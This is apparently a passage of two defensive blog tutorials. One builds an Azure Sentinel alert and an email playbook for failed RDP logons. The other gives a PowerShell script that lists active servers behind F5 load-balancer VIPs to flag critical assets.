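print([e["EventID"] for e in rdp_logon_events(events)])  # [4624, 4625]
```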

image

image

Creating Alerts

Create an alert for the above use case by clicking “Analytics” > Add

image

Give the alert a name, provide a description and set the severity.

image

Set the alert query to detect any RDP login failure:

SecurityEvent
| where EventID == 4625
| project TimeGenerated, WorkstationName,Computer, Account , LogonTypeName , IpAddress
| order by TimeGenerated desc
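The alert above fires on any single failure. A common refinement, sketched here in Python over hypothetical exported events, is to count failures per source IP and flag only sources that cross a threshold, which is what distinguishes a brute-force attempt from a mistyped password.

```python
from collections import Counter

def brute_force_sources(events, threshold=5):
    """Source IPs with at least `threshold` failed logons (EventID 4625)."""
    failures = Counter(e["IpAddress"] for e in events if e["EventID"] == 4625)
    return {ip for ip, count in failures.items() if count >= threshold}

# Six failures from one IP (brute force), one stray failure from another.
events = ([{"EventID": 4625, "IpAddress": "10.0.0.99"}] * 6
          + [{"EventID": 4624, "IpAddress": "10.0.0.99"}]
          + [{"EventID": 4625, "IpAddress": "10.0.0.7"}])
print(brute_force_sources(events))  # {'10.0.0.99'}
```

In KQL, the equivalent aggregation would use summarize count() by IpAddress with a where clause on the count.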

image

Set the entity mapping. These properties will be populated from the projected fields in the query above and will be very useful when we build playbooks. As you can see, only three properties can be mapped at this point, but more are to come.

In this example, the account name used for the attempted login, the host it is tried on and the workstation it is tried from will be populated.

image

Playbook

Playbooks in Azure Sentinel are basically Logic Apps, which are really powerful not only because of the built-in templates but also because they can be heavily customized.

image

Sorry, I just wanted to remind myself again and you, dear reader that logic apps are really powerful. 🙂

image

Create the logic app:

image

In the designer, click on “Blank Logic App”

image

We first need to define the trigger. In this case it is when a response to an Azure Sentinel alert is triggered.
Search for “Sentinel” in the textbox and you will find the trigger. Click on it and it will be added as the first step.

image

We will send an email to the respective team (e.g. Security Operations) when this event happens. In this case I am sending the email to my Office 365 email address.

image

You will need an Office 365 tenant (sign up for a free trial here) to send email.
In the below example, I already have one connected. If I didn't, all I would have to do is sign in with my Office 365 admin account and the connection would be available to send emails.

As you click through the subject and body, you will be prompted to select the dynamic content that carries the relevant data.

image

image

Cases

When an alert fires, it creates a case, and you can execute the relevant playbook for the case.
In this example, we have an alert configured named “rdp-bruce-force attempt-alert”.
Every time that alert fires, it will create a new case with the same name as the alert, along with a case Id.
We can then execute the relevant playbook on the case. In this example, we will execute the playbook we created before, “rdp-bruce-force attempt-alert-playbook”.

In the Sentinel workspace, click on “Cases” to review all the cases and click on the case which got created for the brute-force attempt.

image

At the bottom of the details pane of the case, click on “View full details”.
image

Click “View Playbooks”

image

Click on “Run” for the playbook we want to execute.

image

Below is the email I got as part of the playbook, with the account names from the security event logs.

image

Hope this helps! 🙂


Identify Critical Assets in your environment using F5 Load balancer

Identifying the servers hosting critical applications in your environment is crucial so that alerts for unusual events on those servers are put on higher priority for your security operations team.

One of the approaches we can take to identify the critical assets is by leveraging the load balancer. This could be a head start to build a mini-CMDB (Configuration Management Database) for assets for your sec ops team.

Below is an over-simplified example of a network architecture showing a critical web app named “example.com” hosted on 5 servers which are load balanced on an F5 (VIP : 172.22.23.11). Out of the 5 servers, only 3 are active.

In this example, the goal is to get the active servers behind the VIP.

image

I wrote a PowerShell script to get all the active servers behind all the active VIPs on a given load balancer.

Why this approach?

  1. If a server hosts a critical app, it has to be load balanced.
  2. If a new server is added to an existing VIP, the script will pick it up.
  3. If a server is decommissioned, it becomes inactive on the load balancer and the script will ignore it.

If the script is scheduled to run periodically, we will have an up-to-date list of servers running critical applications. That list can be integrated with a SIEM to prioritize alerts from those servers.

The script 

The PowerShell script makes use of PowerShell cmdlet for F5 which can be downloaded from the below location.
https://devcentral.f5.com/d/microsoft-powershell-with-icontrol?download=true
The downloaded file is a .zip file. Copy it to a local folder, unzip it, and run .\setupSnapin.ps1 from the unzipped contents. You may get an error :

Could not load file or assembly iControlSnapin.dll or one of its dependencies. Operation is not supported. (Exception from HRESULT: 0x8013515
image

Make sure “Unblock” is checked for all the files in the unzipped folder, including “setupSnapin.ps1”.

image

.\setupSnapin.ps1 should work fine now.

image

Below is the script. You will need to change the F5 IP address and the partition name where the virtual servers reside. The output of the script is saved to a file named “ServerList.csv”

Add-PSSnapIn iControlSnapIn

function GetPoolMembers($poolname, $virtual_server_name_only, $virtual_ip)
{
	$poolmembers = $ic.LocalLBPool.get_member_v2(@($poolname))
	$members = $poolmembers[0]
	write-output ($poolname)
	write-output ('Backend servers and ports :')
	$member_status = $ic.LocalLBPool.get_member_object_status($poolname, $poolmembers)

	$node_index = 0
	foreach ($poolmember in $members)
	{
		$availability_status = $member_status[0][$node_index].availability_status
		if ($availability_status -eq "AVAILABILITY_STATUS_GREEN")
		{
			# Strip the partition prefix from the node address
			$ip_address = $poolmember[0].address.replace($active_folder, "").replace("/", "")
			write-output ($ip_address)
			# Column order matches the CSV header defined below
			$global:server_node_details += $ip_address + "," + $virtual_ip + "," + $virtual_server_name_only + "`n"
		}
		$node_index = $node_index + 1
	}
}

$global:server_node_details = "sep=," + "`n"
$global:server_node_details += "Server IP,F5 Virtual IP,F5 Virtual Server Name" + "`n"

$connection = Initialize-F5.iControl -Hostname <Your F5 IP Address> -Credentials (Get-Credential)
$ic = Get-F5.iControl

# Set the active folder aka partition where the virtual servers exist
$active_folder = "/YourPartitionName/"
$ic.SystemSession.set_active_folder($active_folder)

# Get the list of all the virtual servers
$virtual_server_list = $ic.LocalLBVirtualServer.get_list()
foreach ($virtualserver in $virtual_server_list)
{
	$object_status = $ic.LocalLBVirtualServer.get_object_status($virtualserver).availability_status

	if ($object_status -eq "AVAILABILITY_STATUS_GREEN")
	{
		$virtual_server_name_only = $virtualserver.replace($active_folder, "")
		write-output ('Virtual server name ' + $virtualserver)
		$addresses = $ic.LocalLBVirtualServer.get_destination_v2($virtualserver)
		$virtual_ip = $addresses[0].address.replace($active_folder, "")
		write-output ('Virtual IP address : ' + $virtual_ip)
		$pool_name = $ic.LocalLBVirtualServer.get_default_pool_name($virtualserver)
		# Arguments passed in the same order as the function parameters
		GetPoolMembers $pool_name $virtual_server_name_only $virtual_ip
	}
}

$global:server_node_details | Out-File -FilePath .\ServerList.csv

The output
The script output has 3 columns for each server: its IP, the F5 Virtual IP and the Virtual server name.
The Virtual server name is an identifier for the Virtual IP address on the load balancer and usually indicates what the servers behind it are used for. Grouping servers by Virtual server name therefore saves identifying each server individually.
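A downstream SIEM ingestion job might parse ServerList.csv as sketched below. This is an illustrative Python sketch: it skips the Excel-style "sep=," hint on the first line and groups server IPs by Virtual server name.

```python
import csv

def load_server_list(text):
    """Map F5 Virtual Server Name -> list of backend server IPs."""
    lines = text.splitlines()
    if lines and lines[0].startswith("sep="):
        lines = lines[1:]                      # drop the separator hint line
    groups = {}
    for row in csv.DictReader(lines):
        groups.setdefault(row["F5 Virtual Server Name"], []).append(row["Server IP"])
    return groups

sample = ("sep=,\n"
          "Server IP,F5 Virtual IP,F5 Virtual Server Name\n"
          "172.22.1.1,172.22.23.11,example.com\n"
          "172.22.1.2,172.22.23.11,example.com\n")
print(load_server_list(sample))  # {'example.com': ['172.22.1.1', '172.22.1.2']}
```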

In the below hypothetical example of the output, servers 172.22.1.1, 172.22.1.2 and 172.22.1.3 are running the example.com web app.

image

